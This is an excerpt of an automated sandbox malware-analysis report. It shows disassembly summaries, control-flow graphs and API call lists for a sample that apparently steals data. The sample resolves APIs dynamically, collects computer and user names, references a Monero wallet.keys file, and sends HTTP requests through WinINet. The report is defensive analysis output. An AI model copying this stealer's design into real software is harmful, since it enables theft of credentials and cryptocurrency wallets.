                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: a16d7984344e432266c7269f61d3d43f8eaeeb5c7e55513b238222bbfae899b9
                                • Instruction ID: 48485fcf5d0557f10523e20128dea98986d1cb93e0e3b347f1319020326a7912
                                • Opcode Fuzzy Hash: a16d7984344e432266c7269f61d3d43f8eaeeb5c7e55513b238222bbfae899b9
                                • Instruction Fuzzy Hash: FD4104A17E278CEAC734B7A59C4FF9F76565F527C4F517044A82862280CBB075004BB6
                                Function 00EC4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 ec4880-ec4942 call eda7a0 call ec47b0 call eda740 * 5 InternetOpenA StrCmpCA 816 ec494b-ec494f 801->816 817 ec4944 801->817 818 ec4ecb-ec4ef3 InternetCloseHandle call edaad0 call ec9ac0 816->818 819 ec4955-ec4acd call ed8b60 call eda920 call eda8a0 call eda800 * 2 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda920 call eda8a0 call eda800 * 2 InternetConnectA 816->819 817->816 829 ec4ef5-ec4f2d call eda820 call eda9b0 call eda8a0 call eda800 818->829 830 ec4f32-ec4fa2 call ed8990 * 2 call eda7a0 call eda800 * 8 818->830 819->818 905 ec4ad3-ec4ad7 819->905 829->830 906 ec4ad9-ec4ae3 905->906 907 ec4ae5 905->907 908 ec4aef-ec4b22 HttpOpenRequestA 906->908 907->908 909 ec4ebe-ec4ec5 InternetCloseHandle 908->909 910 ec4b28-ec4e28 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda740 call eda920 * 2 call eda8a0 call eda800 * 2 call edaad0 lstrlen call edaad0 * 2 lstrlen call edaad0 HttpSendRequestA 908->910 909->818 1021 ec4e32-ec4e5c InternetReadFile 910->1021 1022 ec4e5e-ec4e65 1021->1022 1023 ec4e67-ec4eb9 InternetCloseHandle call eda800 1021->1023 1022->1023 1024 ec4e69-ec4ea7 call eda9b0 call eda8a0 call eda800 1022->1024 1023->909 1024->1021
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC4915
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EE0DDB,00000000,?,?,00000000,?,",00000000,?,00DAEA10), ref: 00EC4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC4E49
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EC5
                                • HttpOpenRequestA.WININET(00000000,00DAE920,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC4B15
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction ID: 55fe9427c86c2c6351008521cb85ec8ce604c782ea5fb1cd910065eaa635e14b
                                • Opcode Fuzzy Hash: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction Fuzzy Hash: BC127F769102189ACB19EB50DCA6FEEB3B8EF54300F5451AAB50673191EF702F4ACF61
                                Function 00ED78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction ID: 90ce5dbb4e347e22fbbce409cccb523a4b0dacd0bd84d3ae19e3fa7c594dc057
                                • Opcode Fuzzy Hash: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction Fuzzy Hash: 080162B1948308EBC714DF95D945BAEBBB8FB44B15F10422BE595B3380D3B459418BA1
                                Function 00ED7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: eeb95187e79aea61964998480e5236d7e515f09e1c1781d323ad974b9f725717
                                • Instruction ID: 22b15e7c101ac4eddacb07a701a78887ea9292e7df6f41d3815130b68c0861f3
                                • Opcode Fuzzy Hash: eeb95187e79aea61964998480e5236d7e515f09e1c1781d323ad974b9f725717
                                • Instruction Fuzzy Hash: 45F04FB1D44308ABC714DF98D949BAEBBB8EB04711F10026AFA15A3780C7B515448BA1
                                Function 00EC1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 581ed7e731e0f4a80c0811f99420532c18ef3d60e923205d75925ba8f2d5adc1
                                • Instruction ID: 44f5244c61b6cd173d73f545067b27bd06cb9276fe300437a29988a323922afa
                                • Opcode Fuzzy Hash: 581ed7e731e0f4a80c0811f99420532c18ef3d60e923205d75925ba8f2d5adc1
                                • Instruction Fuzzy Hash: CED01774D003089BCB149AA0A949A9DBB78FB08311F0015A8D90662240EA7254828BA5
                                Function 00ED9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 ed9c10-ed9c1a 634 eda036-eda0ca LoadLibraryA * 8 633->634 635 ed9c20-eda031 GetProcAddress * 43 633->635 636 eda0cc-eda141 GetProcAddress * 5 634->636 637 eda146-eda14d 634->637 635->634 636->637 638 eda216-eda21d 637->638 639 eda153-eda211 GetProcAddress * 8 637->639 640 eda21f-eda293 GetProcAddress * 5 638->640 641 eda298-eda29f 638->641 639->638 640->641 642 eda2a5-eda332 GetProcAddress * 6 641->642 643 eda337-eda33e 641->643 642->643 644 eda41f-eda426 643->644 645 eda344-eda41a GetProcAddress * 9 643->645 646 eda428-eda49d GetProcAddress * 5 644->646 647 eda4a2-eda4a9 644->647 645->644 646->647 648 eda4dc-eda4e3 647->648 649 eda4ab-eda4d7 GetProcAddress * 2 647->649 650 eda515-eda51c 648->650 651 eda4e5-eda510 GetProcAddress * 2 648->651 649->648 652 eda612-eda619 650->652 653 eda522-eda60d GetProcAddress * 10 650->653 651->650 654 eda67d-eda684 652->654 655 eda61b-eda678 GetProcAddress * 4 652->655 653->652 656 eda69e-eda6a5 654->656 657 eda686-eda699 GetProcAddress 654->657 655->654 658 eda708-eda709 656->658 659 eda6a7-eda703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,00D95570), ref: 00ED9C2D
                                • GetProcAddress.KERNEL32(74DD0000,00D95590), ref: 00ED9C45
                                • GetProcAddress.KERNEL32(74DD0000,00DA9388), ref: 00ED9C5E
                                • GetProcAddress.KERNEL32(74DD0000,00DA9370), ref: 00ED9C76
                                • GetProcAddress.KERNEL32(74DD0000,00DA93D0), ref: 00ED9C8E
                                • GetProcAddress.KERNEL32(74DD0000,00DA9220), ref: 00ED9CA7
                                • GetProcAddress.KERNEL32(74DD0000,00D9B530), ref: 00ED9CBF
                                • GetProcAddress.KERNEL32(74DD0000,00DACE50), ref: 00ED9CD7
                                • GetProcAddress.KERNEL32(74DD0000,00DACEF8), ref: 00ED9CF0
                                • GetProcAddress.KERNEL32(74DD0000,00DAD078), ref: 00ED9D08
                                • GetProcAddress.KERNEL32(74DD0000,00DACDD8), ref: 00ED9D20
                                • GetProcAddress.KERNEL32(74DD0000,00D952B0), ref: 00ED9D39
                                • GetProcAddress.KERNEL32(74DD0000,00D954B0), ref: 00ED9D51
                                • GetProcAddress.KERNEL32(74DD0000,00D95430), ref: 00ED9D69
                                • GetProcAddress.KERNEL32(74DD0000,00D95310), ref: 00ED9D82
                                • GetProcAddress.KERNEL32(74DD0000,00DACF58), ref: 00ED9D9A
                                • GetProcAddress.KERNEL32(74DD0000,00DACFD0), ref: 00ED9DB2
                                • GetProcAddress.KERNEL32(74DD0000,00D9B5D0), ref: 00ED9DCB
                                • GetProcAddress.KERNEL32(74DD0000,00D953B0), ref: 00ED9DE3
                                • GetProcAddress.KERNEL32(74DD0000,00DACFE8), ref: 00ED9DFB
                                • GetProcAddress.KERNEL32(74DD0000,00DACE20), ref: 00ED9E14
                                • GetProcAddress.KERNEL32(74DD0000,00DAD000), ref: 00ED9E2C
                                • GetProcAddress.KERNEL32(74DD0000,00DACEE0), ref: 00ED9E44
                                • GetProcAddress.KERNEL32(74DD0000,00D95350), ref: 00ED9E5D
                                • GetProcAddress.KERNEL32(74DD0000,00DACEC8), ref: 00ED9E75
                                • GetProcAddress.KERNEL32(74DD0000,00DACDA8), ref: 00ED9E8D
                                • GetProcAddress.KERNEL32(74DD0000,00DACDF0), ref: 00ED9EA6
                                • GetProcAddress.KERNEL32(74DD0000,00DAD060), ref: 00ED9EBE
                                • GetProcAddress.KERNEL32(74DD0000,00DACF10), ref: 00ED9ED6
                                • GetProcAddress.KERNEL32(74DD0000,00DAD090), ref: 00ED9EEF
                                • GetProcAddress.KERNEL32(74DD0000,00DACE08), ref: 00ED9F07
                                • GetProcAddress.KERNEL32(74DD0000,00DAD018), ref: 00ED9F1F
                                • GetProcAddress.KERNEL32(74DD0000,00DAD030), ref: 00ED9F38
                                • GetProcAddress.KERNEL32(74DD0000,00DAA2F0), ref: 00ED9F50
                                • GetProcAddress.KERNEL32(74DD0000,00DACF28), ref: 00ED9F68
                                • GetProcAddress.KERNEL32(74DD0000,00DACEB0), ref: 00ED9F81
                                • GetProcAddress.KERNEL32(74DD0000,00D955B0), ref: 00ED9F99
                                • GetProcAddress.KERNEL32(74DD0000,00DACF40), ref: 00ED9FB1
                                • GetProcAddress.KERNEL32(74DD0000,00D955D0), ref: 00ED9FCA
                                • GetProcAddress.KERNEL32(74DD0000,00DAD048), ref: 00ED9FE2
                                • GetProcAddress.KERNEL32(74DD0000,00DACF70), ref: 00ED9FFA
                                • GetProcAddress.KERNEL32(74DD0000,00D955F0), ref: 00EDA013
                                • GetProcAddress.KERNEL32(74DD0000,00D95610), ref: 00EDA02B
                                • LoadLibraryA.KERNEL32(00DACDC0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA03D
                                • LoadLibraryA.KERNEL32(00DACE38,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA04E
                                • LoadLibraryA.KERNEL32(00DACE68,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA060
                                • LoadLibraryA.KERNEL32(00DACE80,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA072
                                • LoadLibraryA.KERNEL32(00DACE98,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA083
                                • LoadLibraryA.KERNEL32(00DACF88,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA095
                                • LoadLibraryA.KERNEL32(00DACFA0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0A7
                                • LoadLibraryA.KERNEL32(00DACFB8,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0B8
                                • GetProcAddress.KERNEL32(75290000,00D95870), ref: 00EDA0DA
                                • GetProcAddress.KERNEL32(75290000,00DAD240), ref: 00EDA0F2
                                • GetProcAddress.KERNEL32(75290000,00DA8F78), ref: 00EDA10A
                                • GetProcAddress.KERNEL32(75290000,00DAD228), ref: 00EDA123
                                • GetProcAddress.KERNEL32(75290000,00D95670), ref: 00EDA13B
                                • GetProcAddress.KERNEL32(73B40000,00D9B378), ref: 00EDA160
                                • GetProcAddress.KERNEL32(73B40000,00D95890), ref: 00EDA179
                                • GetProcAddress.KERNEL32(73B40000,00D9B738), ref: 00EDA191
                                • GetProcAddress.KERNEL32(73B40000,00DAD1B0), ref: 00EDA1A9
                                • GetProcAddress.KERNEL32(73B40000,00DAD168), ref: 00EDA1C2
                                • GetProcAddress.KERNEL32(73B40000,00D95710), ref: 00EDA1DA
                                • GetProcAddress.KERNEL32(73B40000,00D956F0), ref: 00EDA1F2
                                • GetProcAddress.KERNEL32(73B40000,00DAD378), ref: 00EDA20B
                                • GetProcAddress.KERNEL32(752C0000,00D958D0), ref: 00EDA22C
                                • GetProcAddress.KERNEL32(752C0000,00D95630), ref: 00EDA244
                                • GetProcAddress.KERNEL32(752C0000,00DAD180), ref: 00EDA25D
                                • GetProcAddress.KERNEL32(752C0000,00DAD390), ref: 00EDA275
                                • GetProcAddress.KERNEL32(752C0000,00D95650), ref: 00EDA28D
                                • GetProcAddress.KERNEL32(74EC0000,00D9B3F0), ref: 00EDA2B3
                                • GetProcAddress.KERNEL32(74EC0000,00D9B670), ref: 00EDA2CB
                                • GetProcAddress.KERNEL32(74EC0000,00DAD270), ref: 00EDA2E3
                                • GetProcAddress.KERNEL32(74EC0000,00D956B0), ref: 00EDA2FC
                                • GetProcAddress.KERNEL32(74EC0000,00D95790), ref: 00EDA314
                                • GetProcAddress.KERNEL32(74EC0000,00D9B5A8), ref: 00EDA32C
                                • GetProcAddress.KERNEL32(75BD0000,00DAD2A0), ref: 00EDA352
                                • GetProcAddress.KERNEL32(75BD0000,00D957B0), ref: 00EDA36A
                                • GetProcAddress.KERNEL32(75BD0000,00DA8F28), ref: 00EDA382
                                • GetProcAddress.KERNEL32(75BD0000,00DAD258), ref: 00EDA39B
                                • GetProcAddress.KERNEL32(75BD0000,00DAD198), ref: 00EDA3B3
                                • GetProcAddress.KERNEL32(75BD0000,00D957D0), ref: 00EDA3CB
                                • GetProcAddress.KERNEL32(75BD0000,00D957F0), ref: 00EDA3E4
                                • GetProcAddress.KERNEL32(75BD0000,00DAD150), ref: 00EDA3FC
                                • GetProcAddress.KERNEL32(75BD0000,00DAD108), ref: 00EDA414
                                • GetProcAddress.KERNEL32(75A70000,00D958B0), ref: 00EDA436
                                • GetProcAddress.KERNEL32(75A70000,00DAD0F0), ref: 00EDA44E
                                • GetProcAddress.KERNEL32(75A70000,00DAD0A8), ref: 00EDA466
                                • GetProcAddress.KERNEL32(75A70000,00DAD1C8), ref: 00EDA47F
